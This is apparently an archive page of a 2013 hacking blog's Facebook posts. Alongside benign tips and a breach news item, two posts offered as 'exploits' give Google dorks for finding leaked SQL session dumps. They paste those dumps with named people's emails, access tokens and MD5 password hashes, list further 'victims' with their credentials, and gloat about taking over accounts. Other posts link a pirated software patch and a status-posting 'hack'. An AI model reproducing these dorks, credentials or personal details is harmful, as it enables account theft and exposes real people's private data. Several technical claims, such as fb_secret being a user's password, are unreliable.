Showing posts with label Facebook. Show all posts
Wednesday, May 15, 2013
Create your own image code for Facebook chat
Follow These Simple Steps-







Thank you ! Keep Visiting .
Sunday, May 12, 2013
Facebook Session Exploit Private by Mauritania Attacker
###############################################
#Title: Facebook session Exploit Priv8
#Description : Parameters Logins Facebook
#Exploitation: Manually and use your Brain ^_^
#Date: 12/05/2013
#Author: Mauritania Attacker
#Greetz : All AnonGhost Members <3 br="">###############################################
Hi All Today i'm going to Explain about the new Exploit i found in Facebook , This time it's an advanced Exploit ^_^ i'm going to explain
step by step.
First , Facebook Token is a Code wich from you can access to another account or view Datas given by your friend , or by an admin of a page or an application.
POC : https://graph.facebook.com/303943362983320/accounts/test-users?installed=true&name=test&permissions=read_stream&method=post&access_token=303943362983320|gdHOjhabhCio0zTGiYKDhZcuUo0
So the Token Code is : gdHOjhabhCio0zTGiYKDhZcuUo0
Before the Token Code we have "|" do not forget like you see in the url.
The Id of the Application is : 303943362983320
So here is the results as you can see :
{
"id": "100005941890185",
"email": "test_yqvqkrx_test\u0040tfbnw.net",
"access_token": "CAAEUb1QutZAgBAKZBAZCw0C5iwP6vcrm6ZARLLuVZCyopLmfGC8ReGrN9jBLt8KcDoybAPJ0qZAZCUZBHFyZCU4xsFT4VvjaCbJisW7dflRZBvroVbeFUJg9PMwFgV0tO83LteqJOCiRGLWXnnsiS0BrPZANGFObF5gmI0ZD",
"login_url": "https://www.facebook.com/platform/test_account_login.php?user_id=100005941890185&n=cNdaa9hGgmzmcvi",
"password": "147905033"
}
#We can see the password and the login url but this method is just to get Users of a Facebook Application.
#So now let's get inside the serious things Facebook `ci_sessions` is the Log sent by "login.facebook.com" to another servers that are using
Facebook Plugins or Modules and it has all parameters of the Logins of Accounts used by Most of the Websites and the best thing is that the Hash password is
in MD5 (ascii Text) that mean that it can be decrypted without any problem ^_^ .
#There is Also A second Log called `WRITE` you can try to find another Logs Var , \!/ Hacking is Art of Exploitation \!/
Parameters are :
*fb_apiid
*fb_apikey
*fb_secret (Password of the Account in Hash MD5)
*fb_accesstoken
*fb_uservisitor
*facebook_id
*facebook_name
*facebook_first_name
*facebook_last_name
*facebook_link
*facebook_username
*facebook_hometown (tracer)
*facebook_location (tracer)
#These are the most Important Parameters of a Facebook account and there is all parameters in the Exploit and also i wanted to show you these two importants
Parameters :
*facebook_hometown (tracer)
*facebook_location (tracer
#It shows how can Facebook trace people and where is the locations saved in their Database ,you can even use a php Backdoor Script with that Parameters
and you will receive all Details in your email \!/
#So You can see that Facebook has been totally exploited ^_^ and now i leave you with the Datas so you can be sure that you understand the Exploit.
*Example Of Facebook `ci_sessions` :
Facebook `ci_sessions` "id\";s:1:\"1\";s:4:\"\";s:9:\"\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"223122544391265\";s:9:\"fb_apikey\";s:15:\"223122544391265\";s:9:\"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\";s:3:\"url\";s:29:\"apps.facebook.com/oinstaller/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:14:\"fb_uservisitor\";s:15:\"100001444879309\";s:11:\"facebook_id\";s:15:\"100001444879309\";s:13:\"facebook_name\";s:13:\"Owen Peredo D\";s:19:\"facebook_first_name\";s:4:\"Owen\";s:18:\"facebook_last_name\";s:8:\"Peredo D\";s:13:\"facebook_link\";s:34:\"http://www.facebook.com/owenperedo\";s:17:\"facebook_username\";s:10:\"owenperedo\";s:17:\"facebook_hometown\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:17:\"facebook_location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:12:\"facebook_bio\";s:21:\"Alegre y divertido!!!\";s:13:\"facebook_work\";a:1:{i:0;O:8:\"stdClass\":5:{s:8:\"employer\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"145505632143902\";s:4:\"\";s:8:\"Sysdecom\";}s:8:\"location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:8:\"position\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"131462966897408\";s:4:\"\";s:19:\"Gerente Propietario\";}s:11:\"description\";s:27:\"Systems development Company\";s:10:\"start_date\";s:7:\"2008-01\";}}s:15:\"facebook_sports\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"103998839637434\";s:4:\"\";s:20:\"Association football\";}}s:23:\"facebook_favorite_teams\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:12:\"197394889304\";s:4:\"\";s:12:\"FC Barcelona\";}}s:26:\"facebook_favorite_athletes\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"176063032413299\";s:4:\"\";s:9:\"Leo Messi\";}}s:29:\"facebook_inspirational_people\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:11:\"19987834992\";s:4:\"\";s:11:\"Hilary Duff\";}}s:18:\"facebook_education\";a:3:{i:0;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106494992721308\";s:4:\"\";s:24:\"joseph nicolas maldonado\";}s:4:\"type\";s:11:\"High School\";}i:1;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106233722748482\";s:4:\"\";s:4:\"UMSS\";}s:4:\"type\";s:7:\"College\";}i:2;O:8:\"stdClass\":3:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106462112722590\";s:4:\"\";s:30:\"Centro Boliviano Americano CBA\";}s:4:\"year\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"201638419856163\";s:4:\"\";s:4:\"2011\";}s:4:\"type\";s:7:\"College\";}}s:15:\"facebook_gender\";s:4:\"male\";s:17:\"facebook_timezone\";i:-4;s:15:\"facebook_locale\";s:5:\"en_US\";s:18:\"facebook_languages\";a:2:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"110343528993409\";s:4:\"\";s:7:\"Spanish\";}i:1;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106059522759137\";s:4:\"\";s:7:\"English\";}}s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-08-10T12:59:54+0000\";s:16:\"campaign_user_id\";s:1:\"5\";s:10:\"fanpage_id\";s:15:\"181056671916971\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001444879309\";s:10:\"user_token\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:16:\"id_pageinstalled\";s:2:\"63\";s:14:\"isFanpageAdmin\";b:1;}'),('63207e3bb6293317511e1731de110bdc','186.22.142.214','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1318966975,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:14:\"fb_uservisitor\";s:9:\"689991521\";s:11:\"facebook_id\";s:9:\"689991521\";s:13:\"facebook_name\";s:14:\"Matias O\'Keefe\";s:19:\"facebook_first_name\";s:6:\"Matias\";s:18:\"facebook_last_name\";s:7:\"O\'Keefe\";s:13:\"facebook_link\";s:37:\"http://www.facebook.com/matias.okeefe\";s:17:\"facebook_username\";s:13:\"matias.okeefe\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:23:\"matias.okeefe@gmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-17T12:06:55+0000\";s:16:\"campaign_user_id\";i:7;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:9:\"689991521\";s:10:\"user_token\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('b20a63bc8a68f130feb7321c58b56d8d','190.244.13.94','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.',1318967000,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:14:\"fb_uservisitor\";s:15:\"100000365619835\";s:11:\"facebook_id\";s:15:\"100000365619835\";s:13:\"facebook_name\";s:13:\"House Gregory\";s:19:\"facebook_first_name\";s:5:\"House\";s:18:\"facebook_last_name\";s:7:\"Gregory\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100000365619835\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:20:\"sfarsuau@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"en_US\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-06T22:24:58+0000\";s:16:\"campaign_user_id\";i:8;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:15:\"100000365619835\";s:10:\"user_token\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('9f82abf03ee6c9c9c052d306452b72d2','200.125.109.35','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1318967163,'a:19:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:0:\"\";s:14:\"fb_uservisitor\";s:0:\"\";s:16:\"campaign_user_id\";s:0:\"\";s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:0:\"\";s:10:\"user_token\";s:0:\"\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('bab185c44a703272b8324c3915e14f45','190.16.128.144','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1319156401,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:14:\"fb_uservisitor\";s:15:\"100001952113675\";s:11:\"facebook_id\";s:15:\"100001952113675\";s:13:\"facebook_name\";s:11:\"Enzo Sifrub\";s:19:\"facebook_first_name\";s:4:\"Enzo\";s:18:\"facebook_last_name\";s:6:\"Sifrub\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100001952113675\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:31:\"francisco.valenzuela@frubis.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-20T14:53:31+0000\";s:16:\"campaign_user_id\";i:9;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001952113675\";s:10:\"user_token\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('3a6f810a85da6f7045d88aad108f33f3','190.224.151.198','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1319156419,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:14:\"fb_uservisitor\";s:10:\"1089777996\";s:11:\"facebook_id\";s:10:\"1089777996\";s:13:\"facebook_name\";s:17:\"Luciano Balmaceda\";s:19:\"facebook_first_name\";s:7:\"Luciano\";s:18:\"facebook_last_name\";s:9:\"Balmaceda\";s:13:\"facebook_link\";s:39:\"http://www.facebook.com/lucho.balmaceda\";s:17:\"facebook_username\";s:15:\"lucho.balmaceda\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:27:\"lucho.balmaceda@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-19T14:48:37+0000\";s:16:\"campaign_user_id\";i:10;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:10:\"1089777996\";s:10:\"user_token\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}');
*Example of Facebook `WRITE` session :
(6,'fbsecret','823215e0b822191b1451b7f48f877dd5'),
(5,'fbapi','ffc4ba57627eebfd1d41ca7d7107123e'),
(7,'pageid','188846611127079'),
(8,'pagename','St Maria Goretti Church'),
(9,'pagetoken','122582234479418|a17360823010b076c960588f-58100826|188846611127079|F7ae3Q3oYkZsu6TwJls-7EZx8PM'),
(10,'Cancellations','2'),
(11,'Bulletins','3'),
(12,'Cancellations/Delays','4'),
(13,'Church Blog','')
#Dorks that you can use or create your own Dorks ^_^
Dork1: ext:sql "fb_secret\"
Dork2: ext:sql "fb_username\"
Dork3: ext:sql "fb_id\"
Dork4: ext:sql "fb_secret\" ci_sessions
Dork5 : ext:sql "fb_secret\" WRITE
#Demo :
*User Facebook : facebook_username\";s:10:\"owenperedo ================>>> Username Facebook : www.facebook.com/owenperedo
*Pass Facebook : \"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\ ================>>> Password Facebook : 49c853d3d0718fd0419fd58ac183bbce (MD5)
#Note that almost of CMS like "Wordpress" , "Joomla" , "Drupal" , etc.. and another Websites has this Bug you can find the Datas in any extensions :
"sql" , "xml" , "dat" , "txt"
Last Exploit Found in Twitter : http://www.hackerzadda.com/2013/05/twitter-exploit-priv8-2013.html
Enj0y Fucking Facebook Accounts ^_^
3>
Tuesday, April 2, 2013
How To Get Facebook's New News Feed
World's #1 social network Facebook has updated a new design on it's news feed. Facebook developer team regularly introduce new features to keep it's current place among social network sites. Now they have concentrated on Facebook news feed. Facebook news feed is turned into a new look, now you can focus on stories from your friends. Earlier, all the stories appeared in your news feed but now Facebook allows you to filter stories with following options.
All Friends - a feed that shows you everything your friends are sharing.
Photos - a feed with nothing but photos from your friends and the Pages you like on Facebook.
Music - a feed with posts about the music you listen to music which your friends listen to.
Following - a feed with the latest news from the Pages you like and the people you follow.
Facebook shows the same view in whatever you log with like mobile devices, tablets and desktop versions with this useful new feature. All the Facebook users can get this new design in upcoming weeks. If you want to get this new feature soon on your Facebook account,then follow the given steps below.
All Friends - a feed that shows you everything your friends are sharing.
Photos - a feed with nothing but photos from your friends and the Pages you like on Facebook.
Music - a feed with posts about the music you listen to music which your friends listen to.
Following - a feed with the latest news from the Pages you like and the people you follow.
Facebook shows the same view in whatever you log with like mobile devices, tablets and desktop versions with this useful new feature. All the Facebook users can get this new design in upcoming weeks. If you want to get this new feature soon on your Facebook account,then follow the given steps below.
How to get New News Feed?
Sign-in to your Facebook account.
Click here to go Facebook News Feed.
Now scroll down the windows to bottom.
After that, click on Join Waiting List button.
That's all, Now you are in waiting list for getting Facebook new news feed.
Friday, March 29, 2013
Internet Download Manager (Including Patch for Lifetime and for the versions yet to be released)
HERE IS THE INTERNET DOWNLOAD MANAGER PATCH WORKING WITH ALL VERSION OF INTERNET DOWNLOAD MANAGER(IDM) I M USING THIS FROM 1 YEAR.... AND ITS WORKING WITH ALL VERSION...
DOWNLOAD :- INTERNET DOWNLOAD MANAGER FROM OFFICIAL SITE
INTERNET DOWNLOAD MANAGER
PATCH :-
INTERNET DOWNLOAD MANAGER PATCH
Thursday, March 28, 2013
Facebook 0Day 2013: Exploit Facebook Via External Plugins and Modules
#############################################################
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################
For Example my victim is =======>>> https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see we got the email & the password :
Email: gonza.la22@gmail.com
Password: e10adc3949ba59abbe56e057f20f883e
Another Demo : http://www.salondaddy.com/profile.php?ID=85
So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever
It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are
backdoored with a javascript malware that can sniff all your informations
So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites
especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!
So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users no doubt , just use your brain !
Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top
Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com
http://www.facebook.com/orso44 ============>>> Facebook Profile
[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5
Another Victim : ==========>>> https://www.facebook.com/kornberg
Infos Retrieved :
[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}
Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand
I just selected this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################
For Example my victim is =======>>> https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see we got the email & the password :
Email: gonza.la22@gmail.com
Password: e10adc3949ba59abbe56e057f20f883e
Another Demo : http://www.salondaddy.com/profile.php?ID=85
So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever
It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are
backdoored with a javascript malware that can sniff all your informations
So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites
especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!
So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users no doubt , just use your brain !
Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top
Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com
http://www.facebook.com/orso44 ============>>> Facebook Profile
[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5
Another Victim : ==========>>> https://www.facebook.com/kornberg
Infos Retrieved :
[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}
Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand
I just selected this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!
Thursday, February 28, 2013
How to Recover a Deleted Facebook Fan Page?
One month ago Facebook deleted millions of pages due to lot of spam and
Un-published Facebook pages for doing heavy of S4S [Share for Share],
L4L [Link for Link] and T4T [Tag 4 Tag].
![]() |
How to Get your Facebook fan pages back? |
You can restore your facebook fan page by sending official form to facebook .
Fill this form & Submit this, If your page is disabled or deleted due to spam or misusing Facebook TOU [Terms Of Use] https://www.facebook.com/help/contact.php?show_form=page_disabled
Fill this form & Submit this, If your page has any bugs while posting contents on page wall https://www.facebook.com/help/contact.php?show_form=pages_bug
Fill this form & Submit this, If your page is not displaying
https://www.facebook.com/help/contact.php?show_form=page_not_displaying
https://www.facebook.com/help/contact.php?show_form=page_not_displaying
Wednesday, February 20, 2013
How To Hack A Facebook Status
Many of you are willing to hack a Facebook status ( means to post status by his/her Facebook account). That is actually not much difficult and here we are gonna expose the easy way to do - what you are willing for. Here is the step-by-step tutorial on how to hack a Facebook Status of someone(you want to target) on Facebook. Follow the instructions below:
Step 1: Make sure to send this link: (https://m.facebook.com/upload.php?email&_rdr), to the person you want to target.
Step 2: Ask the victim to give you an email address of his/her Facebook account (for example:someone@facebook.com).
Step 3: Make sure you have an Gmail account ( if not then just visit Gmail website and sign-up there to make new account).
Step 4: After sign-in to your Gmail account, just Click on the Compose button as shown below.
Step 5: Write email of the victim in the "To" box and write something as a status on "Subject" box and leave the message box empty.
Step 6: After the above steps, simply press the "Send" button to complete the process.
Step 7: Now go on and check his/her Facebook wall/timeline, you will surely find a status you have written in the email.
Keep enjoying with this authentic hacking method. And keep visiting us for interesting hacking tips.
Facebook's Security Breeched - Java Zero-Day Vulnerability Found
Facebook was attacked by unidentified hackers on Friday. The attack was
carried out when Facebook Co.'s employees visited a developer's website
which was, you guessed it, compromised. The malware was installed on
their laptops and so began the journey of Facebook's self-enlightenment.
Facebook published a formal bulletin regarding the security breech titled "Protecting People on Facebook":
Facebook, like every significant internet service, is frequently targeted by those who want to disrupt or access our data and infrastructure. As such, we invest heavily in preventing, detecting, and responding to threats that target our infrastructure, and we never stop working to protect the people who use our service. The vast majority of the time, we are successful in preventing harm before it happens, and our security team works to quickly and effectively investigate and stop abuse.
Last month, Facebook Security discovered that our systems had been targeted in a sophisticated attack. This attack occurred when a handful of employees visited a mobile developer website that was compromised. The compromised website hosted an exploit which then allowed malware to be installed on these employee laptops. The laptops were fully-patched and running up-to-date anti-virus software. As soon as we discovered the presence of the malware, we remediated all infected machines, informed law enforcement, and began a significant investigation that continues to this day.
We have found no evidence that Facebook user data was compromised.
Previously, Facebook had claimed that none of the data that it has authority over or has been intrusted to them was compromised in the attack. In response to which Kevin Mitnick, the founder of Mitnick Security Consulting LLC, tweeted:
Surely enough, Facebook's CSO, Joe Sullivan is then reported to have said in an interview:
An analysis of the activity of the malware showed that "they were trying to move laterally into our production environment," Sullivan said. The attackers gained "some limited visibility" into production systems, but a forensic review found no evidence that data was exfiltrated from that. However, some of the information on the laptops themselves—"what you typically find on an engineer's laptop," Sullivan said—was harvested by the hackers, including corporate data, e-mail, and some software code.
It is reported that the security breech occurred to due a Java zero-day
vulnerability. Through this exploit the hackers were able to infiltrate
Facebook's network and inject malware. Facebook now claims that the
exploit has been patched and anti-virused. Therefore, users of Facebook
can be at ease again.
Facebook has been jumping up and down trying to convince its users that
their sensitive data has not been compromised by the attack:
There are a few important points that people on Facebook should understand about this attack:
- Foremost, we have found no evidence that Facebook user data was compromised.
- We will continue to work with law enforcement and the other organizations and entities affected by this attack. It is in everyone’s interests for our industry to work together to prevent attacks such as these in the future.
However, we would request all our readers to switch off Java in their browsers.
Cheers!
Sunday, February 17, 2013
Facebook Status Update Trick
This is an amazing facebook trick which you would love to use. So the trick is to update your status with name of any app like Nasa, Iphone 5, HTC etc. Still confused just follow below instruction and clear your mind.
1. First Login to your Facebook account.
2. Copy below link into address bar as shown in the below picture.
http://www.facebook.com/connect/prompt_feed.php?preview=true&display=touch& api_key=XXXXXXXXX&target_id=YYYYYYYYYY
3. In place on XXXX put api key given in below list and in place of YYYY put profile id of
person where you want to publish your message.
4. Now you will be redirected to new screen as above enter your message and done.
API KEY LIST
- Skynet (249284985083592)
- iPhone (6628568379)
- Blackberry (2254487659)
- Palm (7081486362)
- Sidekick (21810043296)
- Sony Ericsson (38125372145)
- Xbox LIVE (5747726667)
- iPad (112930718741625)
- Foursquare (86734274142)
- Telegram (140881489259157)
- Carrier Pigeon (130263630347328)
- Morse Code (134929696530963)
- Message in a Bottle (123903037653697)
- Commodore 64 (138114659547999)
- Your moms computer (132386310127809)
- TRS-80 (134998549862981)
- K.I.T.T. (129904140378622)
- Mind Computer Interface (121111184600360)
- eyePhone (110455835670222)
- toaster (203192803063920)
- microwave (0a5266c8844a1b09211e7eb38242ac2f)
- Super Nintendo Entertainment System (235703126457431)
- Gameboy Color (180700501993189)
- GoD (256591344357588)
- Glade Air Freshner (4aeb4db2e8df1cdb7f952b2269afb560)
- Strawberry (a4c9fb1708a848c2241674531176209b)
- The moon (221826277855257)
- Dr. Pepper (eea90d40e1d12565695dbbbdbd5e965b)
- Nintendo wii (243870508973644)
- Alcohol (250335888312118)
- Cheese (218791271497130)
- iPod Nano (142039005875499)
- Nintendo 64 (236264753062118)
- Microsoft Excel (242740155751069)
- Linux Ubuntu (220593361311050)
- iPhone 5g (211333348912523)
- My Bedroom (174811032586879)
- Your Mums Bedroom (5f64bbc9ac2f12b983200925da461322)
- Lamp (230755826955133)
- Your moms anus (b625297b655f0b46c86b68f754b82121)
- Refrigerator (250828364944350)
- A potato (127926427295267)
- Nasa Satellite (31d608d30292175bf7703149699ccb39)
